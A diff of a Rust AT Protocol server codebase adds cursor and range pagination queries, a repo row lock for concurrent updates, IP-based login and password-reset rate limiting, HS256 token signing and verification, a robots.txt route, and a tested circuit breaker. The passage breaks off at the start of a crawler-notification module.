else { 200 - if reverse { 201 - sqlx::query!( 202 - "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey DESC LIMIT $3", 203 - user_id, 204 - input.collection, 205 - limit_i64 206 - ) 207 - .fetch_all(&state.db) 208 - .await 209 - .map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>()) 210 - } else { 211 - sqlx::query!( 212 - "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey ASC LIMIT $3", 213 - user_id, 214 - input.collection, 215 - limit_i64 216 - ) 217 - .fetch_all(&state.db) 218 - .await 219 - .map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>()) 220 } 221 }; 222 223 let rows = match rows_res {
··· 167 168 let limit = input.limit.unwrap_or(50).clamp(1, 100); 169 let reverse = input.reverse.unwrap_or(false); 170 let limit_i64 = limit as i64; 171 + let order = if reverse { "ASC" } else { "DESC" }; 172 + 173 + let rows_res: Result<Vec<(String, String)>, sqlx::Error> = if let Some(cursor) = &input.cursor { 174 + let comparator = if reverse { ">" } else { "<" }; 175 + let query = format!( 176 + "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey {} $3 ORDER BY rkey {} LIMIT $4", 177 + comparator, order 178 + ); 179 + sqlx::query_as(&query) 180 + .bind(user_id) 181 + .bind(&input.collection) 182 + .bind(cursor) 183 + .bind(limit_i64) 184 .fetch_all(&state.db) 185 .await 186 } else { 187 + let mut conditions = vec!["repo_id = $1", "collection = $2"]; 188 + let mut param_idx = 3; 189 + 190 + if input.rkey_start.is_some() { 191 + conditions.push("rkey > $3"); 192 + param_idx += 1; 193 } 194 + 195 + if input.rkey_end.is_some() { 196 + conditions.push(if param_idx == 3 { "rkey < $3" } else { "rkey < $4" }); 197 + param_idx += 1; 198 + } 199 + 200 + let limit_idx = param_idx; 201 + 202 + let query = format!( 203 + "SELECT rkey, record_cid FROM records WHERE {} ORDER BY rkey {} LIMIT ${}", 204 + conditions.join(" AND "), 205 + order, 206 + limit_idx 207 + ); 208 + 209 + let mut query_builder = sqlx::query_as::<_, (String, String)>(&query) 210 + .bind(user_id) 211 + .bind(&input.collection); 212 + 213 + if let Some(start) = &input.rkey_start { 214 + query_builder = query_builder.bind(start); 215 + } 216 + if let Some(end) = &input.rkey_end { 217 + query_builder = query_builder.bind(end); 218 + } 219 + 220 + query_builder.bind(limit_i64).fetch_all(&state.db).await 221 }; 222 223 let rows = match rows_res {
+28
src/api/repo/record/utils.rs
··· 58 let mut tx = state.db.begin().await 59 .map_err(|e| format!("Failed to begin transaction: {}", e))?; 60 61 sqlx::query!("UPDATE repos SET repo_root_cid = $1 WHERE user_id = $2", new_root_cid.to_string(), user_id) 62 .execute(&mut *tx) 63 .await
··· 58 let mut tx = state.db.begin().await 59 .map_err(|e| format!("Failed to begin transaction: {}", e))?; 60 61 + let lock_result = sqlx::query!( 62 + "SELECT repo_root_cid FROM repos WHERE user_id = $1 FOR UPDATE NOWAIT", 63 + user_id 64 + ) 65 + .fetch_optional(&mut *tx) 66 + .await; 67 + 68 + match lock_result { 69 + Err(e) => { 70 + if let Some(db_err) = e.as_database_error() { 71 + if db_err.code().as_deref() == Some("55P03") { 72 + return Err("ConcurrentModification: Another request is modifying this repo".to_string()); 73 + } 74 + } 75 + return Err(format!("Failed to acquire repo lock: {}", e)); 76 + } 77 + Ok(Some(row)) => { 78 + if let Some(expected_root) = &current_root_cid { 79 + if row.repo_root_cid != expected_root.to_string() { 80 + return Err("ConcurrentModification: Repo has been modified since last read".to_string()); 81 + } 82 + } 83 + } 84 + Ok(None) => { 85 + return Err("Repo not found".to_string()); 86 + } 87 + } 88 + 89 sqlx::query!("UPDATE repos SET repo_root_cid = $1 WHERE user_id = $2", new_root_cid.to_string(), user_id) 90 .execute(&mut *tx) 91 .await
+8
src/api/server/meta.rs
··· 4 5 use tracing::error; 6 7 pub async fn describe_server() -> impl IntoResponse { 8 let domains_str = 9 std::env::var("AVAILABLE_USER_DOMAINS").unwrap_or_else(|_| "example.com".to_string());
··· 4 5 use tracing::error; 6 7 + pub async fn robots_txt() -> impl IntoResponse { 8 + ( 9 + StatusCode::OK, 10 + [("content-type", "text/plain")], 11 + "# Hello!\n\n# Crawling the public API is allowed\nUser-agent: *\nAllow: /\n", 12 + ) 13 + } 14 + 15 pub async fn describe_server() -> impl IntoResponse { 16 let domains_str = 17 std::env::var("AVAILABLE_USER_DOMAINS").unwrap_or_else(|_| "example.com".to_string());
+1 -1
src/api/server/mod.rs
··· 15 pub use app_password::{create_app_password, list_app_passwords, revoke_app_password}; 16 pub use email::{confirm_email, request_email_update, update_email}; 17 pub use invite::{create_invite_code, create_invite_codes, get_account_invite_codes}; 18 - pub use meta::{describe_server, health}; 19 pub use password::{request_password_reset, reset_password}; 20 pub use service_auth::get_service_auth; 21 pub use session::{create_session, delete_session, get_session, refresh_session};
··· 15 pub use app_password::{create_app_password, list_app_passwords, revoke_app_password}; 16 pub use email::{confirm_email, request_email_update, update_email}; 17 pub use invite::{create_invite_code, create_invite_codes, get_account_invite_codes}; 18 + pub use meta::{describe_server, health, robots_txt}; 19 pub use password::{request_password_reset, reset_password}; 20 pub use service_auth::get_service_auth; 21 pub use session::{create_session, delete_session, get_session, refresh_session};
+31 -1
src/api/server/password.rs
··· 2 use axum::{ 3 Json, 4 extract::State, 5 - http::StatusCode, 6 response::{IntoResponse, Response}, 7 }; 8 use bcrypt::{hash, DEFAULT_COST}; ··· 15 crate::util::generate_token_code() 16 } 17 18 #[derive(Deserialize)] 19 pub struct RequestPasswordResetInput { 20 pub email: String, ··· 22 23 pub async fn request_password_reset( 24 State(state): State<AppState>, 25 Json(input): Json<RequestPasswordResetInput>, 26 ) -> Response { 27 let email = input.email.trim().to_lowercase(); 28 if email.is_empty() { 29 return (
··· 2 use axum::{ 3 Json, 4 extract::State, 5 + http::{HeaderMap, StatusCode}, 6 response::{IntoResponse, Response}, 7 }; 8 use bcrypt::{hash, DEFAULT_COST}; ··· 15 crate::util::generate_token_code() 16 } 17 18 + fn extract_client_ip(headers: &HeaderMap) -> String { 19 + if let Some(forwarded) = headers.get("x-forwarded-for") { 20 + if let Ok(value) = forwarded.to_str() { 21 + if let Some(first_ip) = value.split(',').next() { 22 + return first_ip.trim().to_string(); 23 + } 24 + } 25 + } 26 + if let Some(real_ip) = headers.get("x-real-ip") { 27 + if let Ok(value) = real_ip.to_str() { 28 + return value.trim().to_string(); 29 + } 30 + } 31 + "unknown".to_string() 32 + } 33 + 34 #[derive(Deserialize)] 35 pub struct RequestPasswordResetInput { 36 pub email: String, ··· 38 39 pub async fn request_password_reset( 40 State(state): State<AppState>, 41 + headers: HeaderMap, 42 Json(input): Json<RequestPasswordResetInput>, 43 ) -> Response { 44 + let client_ip = extract_client_ip(&headers); 45 + if state.rate_limiters.password_reset.check_key(&client_ip).is_err() { 46 + warn!(ip = %client_ip, "Password reset rate limit exceeded"); 47 + return ( 48 + StatusCode::TOO_MANY_REQUESTS, 49 + Json(json!({ 50 + "error": "RateLimitExceeded", 51 + "message": "Too many password reset requests. Please try again later." 52 + })), 53 + ) 54 + .into_response(); 55 + } 56 + 57 let email = input.email.trim().to_lowercase(); 58 if email.is_empty() { 59 return (
+31
src/api/server/session.rs
··· 4 use axum::{ 5 Json, 6 extract::State, 7 response::{IntoResponse, Response}, 8 }; 9 use bcrypt::verify; ··· 11 use serde_json::json; 12 use tracing::{error, info, warn}; 13 14 #[derive(Deserialize)] 15 pub struct CreateSessionInput { 16 pub identifier: String, ··· 28 29 pub async fn create_session( 30 State(state): State<AppState>, 31 Json(input): Json<CreateSessionInput>, 32 ) -> Response { 33 info!("create_session called"); 34 35 let row = match sqlx::query!( 36 "SELECT u.id, u.did, u.handle, u.password_hash, k.key_bytes, k.encryption_version FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.handle = $1 OR u.email = $1",
··· 4 use axum::{ 5 Json, 6 extract::State, 7 + http::{HeaderMap, StatusCode}, 8 response::{IntoResponse, Response}, 9 }; 10 use bcrypt::verify; ··· 12 use serde_json::json; 13 use tracing::{error, info, warn}; 14 15 + fn extract_client_ip(headers: &HeaderMap) -> String { 16 + if let Some(forwarded) = headers.get("x-forwarded-for") { 17 + if let Ok(value) = forwarded.to_str() { 18 + if let Some(first_ip) = value.split(',').next() { 19 + return first_ip.trim().to_string(); 20 + } 21 + } 22 + } 23 + if let Some(real_ip) = headers.get("x-real-ip") { 24 + if let Ok(value) = real_ip.to_str() { 25 + return value.trim().to_string(); 26 + } 27 + } 28 + "unknown".to_string() 29 + } 30 + 31 #[derive(Deserialize)] 32 pub struct CreateSessionInput { 33 pub identifier: String, ··· 45 46 pub async fn create_session( 47 State(state): State<AppState>, 48 + headers: HeaderMap, 49 Json(input): Json<CreateSessionInput>, 50 ) -> Response { 51 info!("create_session called"); 52 + 53 + let client_ip = extract_client_ip(&headers); 54 + if state.rate_limiters.login.check_key(&client_ip).is_err() { 55 + warn!(ip = %client_ip, "Login rate limit exceeded"); 56 + return ( 57 + StatusCode::TOO_MANY_REQUESTS, 58 + Json(json!({ 59 + "error": "RateLimitExceeded", 60 + "message": "Too many login attempts. Please try again later." 61 + })), 62 + ) 63 + .into_response(); 64 + } 65 66 let row = match sqlx::query!( 67 "SELECT u.id, u.did, u.handle, u.password_hash, k.key_bytes, k.encryption_version FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.handle = $1 OR u.email = $1",
+48
src/api/temp.rs
···
··· 1 + use axum::{ 2 + Json, 3 + extract::State, 4 + http::{HeaderMap, StatusCode}, 5 + response::{IntoResponse, Response}, 6 + }; 7 + use serde::Serialize; 8 + use serde_json::json; 9 + 10 + use crate::auth::{extract_bearer_token_from_header, validate_bearer_token}; 11 + use crate::state::AppState; 12 + 13 + #[derive(Serialize)] 14 + #[serde(rename_all = "camelCase")] 15 + pub struct CheckSignupQueueOutput { 16 + pub activated: bool, 17 + #[serde(skip_serializing_if = "Option::is_none")] 18 + pub place_in_queue: Option<i64>, 19 + #[serde(skip_serializing_if = "Option::is_none")] 20 + pub estimated_time_ms: Option<i64>, 21 + } 22 + 23 + pub async fn check_signup_queue( 24 + State(state): State<AppState>, 25 + headers: HeaderMap, 26 + ) -> Response { 27 + if let Some(token) = extract_bearer_token_from_header( 28 + headers.get("Authorization").and_then(|h| h.to_str().ok()) 29 + ) { 30 + if let Ok(user) = validate_bearer_token(&state.db, &token).await { 31 + if user.is_oauth { 32 + return ( 33 + StatusCode::FORBIDDEN, 34 + Json(json!({ 35 + "error": "Forbidden", 36 + "message": "OAuth credentials are not supported for this endpoint" 37 + })), 38 + ).into_response(); 39 + } 40 + } 41 + } 42 + 43 + Json(CheckSignupQueueOutput { 44 + activated: true, 45 + place_in_queue: None, 46 + estimated_time_ms: None, 47 + }).into_response() 48 + }
+98
src/auth/token.rs
··· 3 use base64::Engine as _; 4 use base64::engine::general_purpose::URL_SAFE_NO_PAD; 5 use chrono::{DateTime, Duration, Utc}; 6 use k256::ecdsa::{Signature, SigningKey, signature::Signer}; 7 use uuid; 8 9 pub const TOKEN_TYPE_ACCESS: &str = "at+jwt"; 10 pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt"; ··· 118 119 Ok(format!("{}.{}", message, signature_b64)) 120 }
··· 3 use base64::Engine as _; 4 use base64::engine::general_purpose::URL_SAFE_NO_PAD; 5 use chrono::{DateTime, Duration, Utc}; 6 + use hmac::{Hmac, Mac}; 7 use k256::ecdsa::{Signature, SigningKey, signature::Signer}; 8 + use sha2::Sha256; 9 use uuid; 10 + 11 + type HmacSha256 = Hmac<Sha256>; 12 13 pub const TOKEN_TYPE_ACCESS: &str = "at+jwt"; 14 pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt"; ··· 122 123 Ok(format!("{}.{}", message, signature_b64)) 124 } 125 + 126 + pub fn create_access_token_hs256(did: &str, secret: &[u8]) -> Result<String> { 127 + Ok(create_access_token_hs256_with_metadata(did, secret)?.token) 128 + } 129 + 130 + pub fn create_refresh_token_hs256(did: &str, secret: &[u8]) -> Result<String> { 131 + Ok(create_refresh_token_hs256_with_metadata(did, secret)?.token) 132 + } 133 + 134 + pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> { 135 + create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120)) 136 + } 137 + 138 + pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> { 139 + create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90)) 140 + } 141 + 142 + pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> { 143 + let expiration = Utc::now() 144 + .checked_add_signed(Duration::seconds(60)) 145 + .expect("valid timestamp") 146 + .timestamp(); 147 + 148 + let claims = Claims { 149 + iss: did.to_owned(), 150 + sub: did.to_owned(), 151 + aud: aud.to_owned(), 152 + exp: expiration as usize, 153 + iat: Utc::now().timestamp() as usize, 154 + scope: None, 155 + lxm: Some(lxm.to_string()), 156 + jti: uuid::Uuid::new_v4().to_string(), 157 + }; 158 + 159 + sign_claims_hs256(claims, TOKEN_TYPE_SERVICE, secret) 160 + } 161 + 162 + fn create_hs256_token_with_metadata( 163 + did: &str, 164 + scope: &str, 165 + typ: &str, 166 + secret: &[u8], 167 + duration: Duration, 168 + ) -> Result<TokenWithMetadata> { 169 + let expires_at = Utc::now() 170 + .checked_add_signed(duration) 171 + .expect("valid timestamp"); 172 + let expiration = expires_at.timestamp(); 173 + let jti = uuid::Uuid::new_v4().to_string(); 174 + 175 + let claims = Claims { 176 + iss: did.to_owned(), 177 + sub: did.to_owned(), 178 + aud: format!( 179 + "did:web:{}", 180 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()) 181 + ), 182 + exp: expiration as usize, 183 + iat: Utc::now().timestamp() as usize, 184 + scope: Some(scope.to_string()), 185 + lxm: None, 186 + jti: jti.clone(), 187 + }; 188 + 189 + let token = sign_claims_hs256(claims, typ, secret)?; 190 + Ok(TokenWithMetadata { 191 + token, 192 + jti, 193 + expires_at, 194 + }) 195 + } 196 + 197 + fn sign_claims_hs256(claims: Claims, typ: &str, secret: &[u8]) -> Result<String> { 198 + let header = Header { 199 + alg: "HS256".to_string(), 200 + typ: typ.to_string(), 201 + }; 202 + 203 + let header_json = serde_json::to_string(&header)?; 204 + let claims_json = serde_json::to_string(&claims)?; 205 + 206 + let header_b64 = URL_SAFE_NO_PAD.encode(header_json); 207 + let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json); 208 + 209 + let message = format!("{}.{}", header_b64, claims_b64); 210 + 211 + let mut mac = HmacSha256::new_from_slice(secret) 212 + .map_err(|e| anyhow::anyhow!("Invalid secret length: {}", e))?; 213 + mac.update(message.as_bytes()); 214 + let signature = mac.finalize().into_bytes(); 215 + let signature_b64 = URL_SAFE_NO_PAD.encode(signature); 216 + 217 + Ok(format!("{}.{}", message, signature_b64)) 218 + }
+106
src/auth/verify.rs
··· 4 use base64::Engine as _; 5 use base64::engine::general_purpose::URL_SAFE_NO_PAD; 6 use chrono::Utc; 7 use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier}; 8 9 pub fn get_did_from_token(token: &str) -> Result<String, String> { 10 let parts: Vec<&str> = token.split('.').collect(); ··· 63 ) 64 } 65 66 fn verify_token_internal( 67 token: &str, 68 key_bytes: &[u8], ··· 124 125 Ok(TokenData { claims }) 126 }
··· 4 use base64::Engine as _; 5 use base64::engine::general_purpose::URL_SAFE_NO_PAD; 6 use chrono::Utc; 7 + use hmac::{Hmac, Mac}; 8 use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier}; 9 + use sha2::Sha256; 10 + use subtle::ConstantTimeEq; 11 + 12 + type HmacSha256 = Hmac<Sha256>; 13 14 pub fn get_did_from_token(token: &str) -> Result<String, String> { 15 let parts: Vec<&str> = token.split('.').collect(); ··· 68 ) 69 } 70 71 + pub fn verify_access_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> { 72 + verify_token_hs256_internal( 73 + token, 74 + secret, 75 + Some(TOKEN_TYPE_ACCESS), 76 + Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]), 77 + ) 78 + } 79 + 80 + pub fn verify_refresh_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> { 81 + verify_token_hs256_internal( 82 + token, 83 + secret, 84 + Some(TOKEN_TYPE_REFRESH), 85 + Some(&[SCOPE_REFRESH]), 86 + ) 87 + } 88 + 89 fn verify_token_internal( 90 token: &str, 91 key_bytes: &[u8], ··· 147 148 Ok(TokenData { claims }) 149 } 150 + 151 + fn verify_token_hs256_internal( 152 + token: &str, 153 + secret: &[u8], 154 + expected_typ: Option<&str>, 155 + allowed_scopes: Option<&[&str]>, 156 + ) -> Result<TokenData<Claims>> { 157 + let parts: Vec<&str> = token.split('.').collect(); 158 + if parts.len() != 3 { 159 + return Err(anyhow!("Invalid token format")); 160 + } 161 + 162 + let header_b64 = parts[0]; 163 + let claims_b64 = parts[1]; 164 + let signature_b64 = parts[2]; 165 + 166 + let header_bytes = URL_SAFE_NO_PAD 167 + .decode(header_b64) 168 + .context("Base64 decode of header failed")?; 169 + let header: Header = 170 + serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?; 171 + 172 + if header.alg != "HS256" { 173 + return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg)); 174 + } 175 + 176 + if let Some(expected) = expected_typ { 177 + if header.typ != expected { 178 + return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ)); 179 + } 180 + } 181 + 182 + let signature_bytes = URL_SAFE_NO_PAD 183 + .decode(signature_b64) 184 + .context("Base64 decode of signature failed")?; 185 + 186 + let message = format!("{}.{}", header_b64, claims_b64); 187 + let mut mac = HmacSha256::new_from_slice(secret) 188 + .map_err(|e| anyhow!("Invalid secret: {}", e))?; 189 + mac.update(message.as_bytes()); 190 + let expected_signature = mac.finalize().into_bytes(); 191 + 192 + let is_valid: bool = signature_bytes.ct_eq(&expected_signature).into(); 193 + if !is_valid { 194 + return Err(anyhow!("Signature verification failed")); 195 + } 196 + 197 + let claims_bytes = URL_SAFE_NO_PAD 198 + .decode(claims_b64) 199 + .context("Base64 decode of claims failed")?; 200 + let claims: Claims = 201 + serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?; 202 + 203 + let now = Utc::now().timestamp() as usize; 204 + if claims.exp < now { 205 + return Err(anyhow!("Token expired")); 206 + } 207 + 208 + if let Some(scopes) = allowed_scopes { 209 + let token_scope = claims.scope.as_deref().unwrap_or(""); 210 + if !scopes.contains(&token_scope) { 211 + return Err(anyhow!("Invalid token scope: {}", token_scope)); 212 + } 213 + } 214 + 215 + Ok(TokenData { claims }) 216 + } 217 + 218 + pub fn get_algorithm_from_token(token: &str) -> Result<String, String> { 219 + let parts: Vec<&str> = token.split('.').collect(); 220 + if parts.len() != 3 { 221 + return Err("Invalid token format".to_string()); 222 + } 223 + 224 + let header_bytes = URL_SAFE_NO_PAD 225 + .decode(parts[0]) 226 + .map_err(|e| format!("Base64 decode failed: {}", e))?; 227 + 228 + let header: Header = 229 + serde_json::from_slice(&header_bytes).map_err(|e| format!("JSON decode failed: {}", e))?; 230 + 231 + Ok(header.alg) 232 + }
+307
src/circuit_breaker.rs
···
··· 1 + use std::sync::atomic::{AtomicU32, AtomicU64, Ordering}; 2 + use std::sync::Arc; 3 + use std::time::Duration; 4 + use tokio::sync::RwLock; 5 + 6 + #[derive(Debug, Clone, Copy, PartialEq, Eq)] 7 + pub enum CircuitState { 8 + Closed, 9 + Open, 10 + HalfOpen, 11 + } 12 + 13 + pub struct CircuitBreaker { 14 + name: String, 15 + failure_threshold: u32, 16 + success_threshold: u32, 17 + timeout: Duration, 18 + state: Arc<RwLock<CircuitState>>, 19 + failure_count: AtomicU32, 20 + success_count: AtomicU32, 21 + last_failure_time: AtomicU64, 22 + } 23 + 24 + impl CircuitBreaker { 25 + pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self { 26 + Self { 27 + name: name.to_string(), 28 + failure_threshold, 29 + success_threshold, 30 + timeout: Duration::from_secs(timeout_secs), 31 + state: Arc::new(RwLock::new(CircuitState::Closed)), 32 + failure_count: AtomicU32::new(0), 33 + success_count: AtomicU32::new(0), 34 + last_failure_time: AtomicU64::new(0), 35 + } 36 + } 37 + 38 + pub async fn can_execute(&self) -> bool { 39 + let state = self.state.read().await; 40 + match *state { 41 + CircuitState::Closed => true, 42 + CircuitState::Open => { 43 + let last_failure = self.last_failure_time.load(Ordering::SeqCst); 44 + let now = std::time::SystemTime::now() 45 + .duration_since(std::time::UNIX_EPOCH) 46 + .unwrap() 47 + .as_secs(); 48 + 49 + if now - last_failure >= self.timeout.as_secs() { 50 + drop(state); 51 + let mut state = self.state.write().await; 52 + if *state == CircuitState::Open { 53 + *state = CircuitState::HalfOpen; 54 + self.success_count.store(0, Ordering::SeqCst); 55 + tracing::info!(circuit = %self.name, "Circuit breaker transitioning to half-open"); 56 + return true; 57 + } 58 + } 59 + false 60 + } 61 + CircuitState::HalfOpen => true, 62 + } 63 + } 64 + 65 + pub async fn record_success(&self) { 66 + let state = *self.state.read().await; 67 + 68 + match state { 69 + CircuitState::Closed => { 70 + self.failure_count.store(0, Ordering::SeqCst); 71 + } 72 + CircuitState::HalfOpen => { 73 + let count = self.success_count.fetch_add(1, Ordering::SeqCst) + 1; 74 + if count >= self.success_threshold { 75 + let mut state = self.state.write().await; 76 + *state = CircuitState::Closed; 77 + self.failure_count.store(0, Ordering::SeqCst); 78 + self.success_count.store(0, Ordering::SeqCst); 79 + tracing::info!(circuit = %self.name, "Circuit breaker closed after successful recovery"); 80 + } 81 + } 82 + CircuitState::Open => {} 83 + } 84 + } 85 + 86 + pub async fn record_failure(&self) { 87 + let state = *self.state.read().await; 88 + 89 + match state { 90 + CircuitState::Closed => { 91 + let count = self.failure_count.fetch_add(1, Ordering::SeqCst) + 1; 92 + if count >= self.failure_threshold { 93 + let mut state = self.state.write().await; 94 + *state = CircuitState::Open; 95 + let now = std::time::SystemTime::now() 96 + .duration_since(std::time::UNIX_EPOCH) 97 + .unwrap() 98 + .as_secs(); 99 + self.last_failure_time.store(now, Ordering::SeqCst); 100 + tracing::warn!( 101 + circuit = %self.name, 102 + failures = count, 103 + "Circuit breaker opened after {} failures", 104 + count 105 + ); 106 + } 107 + } 108 + CircuitState::HalfOpen => { 109 + let mut state = self.state.write().await; 110 + *state = CircuitState::Open; 111 + let now = std::time::SystemTime::now() 112 + .duration_since(std::time::UNIX_EPOCH) 113 + .unwrap() 114 + .as_secs(); 115 + self.last_failure_time.store(now, Ordering::SeqCst); 116 + self.success_count.store(0, Ordering::SeqCst); 117 + tracing::warn!(circuit = %self.name, "Circuit breaker reopened after failure in half-open state"); 118 + } 119 + CircuitState::Open => {} 120 + } 121 + } 122 + 123 + pub async fn state(&self) -> CircuitState { 124 + *self.state.read().await 125 + } 126 + 127 + pub fn name(&self) -> &str { 128 + &self.name 129 + } 130 + } 131 + 132 + #[derive(Clone)] 133 + pub struct CircuitBreakers { 134 + pub plc_directory: Arc<CircuitBreaker>, 135 + pub relay_notification: Arc<CircuitBreaker>, 136 + } 137 + 138 + impl Default for CircuitBreakers { 139 + fn default() -> Self { 140 + Self::new() 141 + } 142 + } 143 + 144 + impl CircuitBreakers { 145 + pub fn new() -> Self { 146 + Self { 147 + plc_directory: Arc::new(CircuitBreaker::new("plc_directory", 5, 3, 60)), 148 + relay_notification: Arc::new(CircuitBreaker::new("relay_notification", 10, 5, 30)), 149 + } 150 + } 151 + } 152 + 153 + #[derive(Debug)] 154 + pub struct CircuitOpenError { 155 + pub circuit_name: String, 156 + } 157 + 158 + impl std::fmt::Display for CircuitOpenError { 159 + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { 160 + write!(f, "Circuit breaker '{}' is open", self.circuit_name) 161 + } 162 + } 163 + 164 + impl std::error::Error for CircuitOpenError {} 165 + 166 + pub async fn with_circuit_breaker<T, E, F, Fut>( 167 + circuit: &CircuitBreaker, 168 + operation: F, 169 + ) -> Result<T, CircuitBreakerError<E>> 170 + where 171 + F: FnOnce() -> Fut, 172 + Fut: std::future::Future<Output = Result<T, E>>, 173 + { 174 + if !circuit.can_execute().await { 175 + return Err(CircuitBreakerError::CircuitOpen(CircuitOpenError { 176 + circuit_name: circuit.name().to_string(), 177 + })); 178 + } 179 + 180 + match operation().await { 181 + Ok(result) => { 182 + circuit.record_success().await; 183 + Ok(result) 184 + } 185 + Err(e) => { 186 + circuit.record_failure().await; 187 + Err(CircuitBreakerError::OperationFailed(e)) 188 + } 189 + } 190 + } 191 + 192 + #[derive(Debug)] 193 + pub enum CircuitBreakerError<E> { 194 + CircuitOpen(CircuitOpenError), 195 + OperationFailed(E), 196 + } 197 + 198 + impl<E: std::fmt::Display> std::fmt::Display for CircuitBreakerError<E> { 199 + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { 200 + match self { 201 + CircuitBreakerError::CircuitOpen(e) => write!(f, "{}", e), 202 + CircuitBreakerError::OperationFailed(e) => write!(f, "Operation failed: {}", e), 203 + } 204 + } 205 + } 206 + 207 + impl<E: std::error::Error + 'static> std::error::Error for CircuitBreakerError<E> { 208 + fn source(&self) -> Option<&(dyn std::error::Error + 'static)> { 209 + match self { 210 + CircuitBreakerError::CircuitOpen(e) => Some(e), 211 + CircuitBreakerError::OperationFailed(e) => Some(e), 212 + } 213 + } 214 + } 215 + 216 + #[cfg(test)] 217 + mod tests { 218 + use super::*; 219 + 220 + #[tokio::test] 221 + async fn test_circuit_breaker_starts_closed() { 222 + let cb = CircuitBreaker::new("test", 3, 2, 10); 223 + assert_eq!(cb.state().await, CircuitState::Closed); 224 + assert!(cb.can_execute().await); 225 + } 226 + 227 + #[tokio::test] 228 + async fn test_circuit_breaker_opens_after_failures() { 229 + let cb = CircuitBreaker::new("test", 3, 2, 10); 230 + 231 + cb.record_failure().await; 232 + assert_eq!(cb.state().await, CircuitState::Closed); 233 + 234 + cb.record_failure().await; 235 + assert_eq!(cb.state().await, CircuitState::Closed); 236 + 237 + cb.record_failure().await; 238 + assert_eq!(cb.state().await, CircuitState::Open); 239 + assert!(!cb.can_execute().await); 240 + } 241 + 242 + #[tokio::test] 243 + async fn test_circuit_breaker_success_resets_failures() { 244 + let cb = CircuitBreaker::new("test", 3, 2, 10); 245 + 246 + cb.record_failure().await; 247 + cb.record_failure().await; 248 + cb.record_success().await; 249 + 250 + cb.record_failure().await; 251 + cb.record_failure().await; 252 + assert_eq!(cb.state().await, CircuitState::Closed); 253 + 254 + cb.record_failure().await; 255 + assert_eq!(cb.state().await, CircuitState::Open); 256 + } 257 + 258 + #[tokio::test] 259 + async fn test_circuit_breaker_half_open_closes_after_successes() { 260 + let cb = CircuitBreaker::new("test", 3, 2, 0); 261 + 262 + for _ in 0..3 { 263 + cb.record_failure().await; 264 + } 265 + assert_eq!(cb.state().await, CircuitState::Open); 266 + 267 + tokio::time::sleep(Duration::from_millis(100)).await; 268 + 269 + assert!(cb.can_execute().await); 270 + assert_eq!(cb.state().await, CircuitState::HalfOpen); 271 + 272 + cb.record_success().await; 273 + assert_eq!(cb.state().await, CircuitState::HalfOpen); 274 + 275 + cb.record_success().await; 276 + assert_eq!(cb.state().await, CircuitState::Closed); 277 + } 278 + 279 + #[tokio::test] 280 + async fn test_circuit_breaker_half_open_reopens_on_failure() { 281 + let cb = CircuitBreaker::new("test", 3, 2, 0); 282 + 283 + for _ in 0..3 { 284 + cb.record_failure().await; 285 + } 286 + 287 + tokio::time::sleep(Duration::from_millis(100)).await; 288 + cb.can_execute().await; 289 + 290 + cb.record_failure().await; 291 + assert_eq!(cb.state().await, CircuitState::Open); 292 + } 293 + 294 + #[tokio::test] 295 + async fn test_with_circuit_breaker_helper() { 296 + let cb = CircuitBreaker::new("test", 3, 2, 10); 297 + 298 + let result: Result<i32, CircuitBreakerError<std::io::Error>> = 299 + with_circuit_breaker(&cb, || async { Ok(42) }).await; 300 + assert!(result.is_ok()); 301 + assert_eq!(result.unwrap(), 42); 302 + 303 + let result: Result<i32, CircuitBreakerError<&str>> = 304 + with_circuit_breaker(&cb, || async { Err("error") }).await; 305 + assert!(result.is_err()); 306 + } 307 + }
+170
src/crawlers.rs
···
··· 1 + use crate::circuit_breaker::CircuitBreaker; 2 + use crate::sync::firehose::SequencedEvent; 3 + use reqwest::Client; 4 + use std::sync::atomic::{AtomicU64, Ordering}; 5 + use std::sync::Arc; 6 + use std::time::Duration; 7 + use tokio::sync::{broadcast, watch}; 8 + use tracing::{debug, error, info, warn}; 9 + 10 + const NOTIFY_THRESHOLD_SECS: u64 = 20 * 60; 11 + 12 + pub struct Crawlers { 13 + hostname: String, 14 + crawler_urls: Vec<String>, 15 + http_client: Client, 16 + last_notified: AtomicU64, 17 + circuit_breaker: Option<Arc<CircuitBreaker>>, 18 + } 19 + 20 + impl Crawlers { 21 + pub fn new(hostname: String, crawler_urls: Vec<String>) -> Self { 22 + Self { 23 + hostname, 24 + crawler_urls, 25 + http_client: Client::builder() 26 + .timeout(Duration::from_secs(30)) 27 + .build() 28 + .unwrap_or_default(), 29 + last_notified: AtomicU64::new(0), 30 + circuit_breaker: None, 31 + } 32 + } 33 + 34 + pub fn with_circuit_breaker(mut self, circuit_breaker: 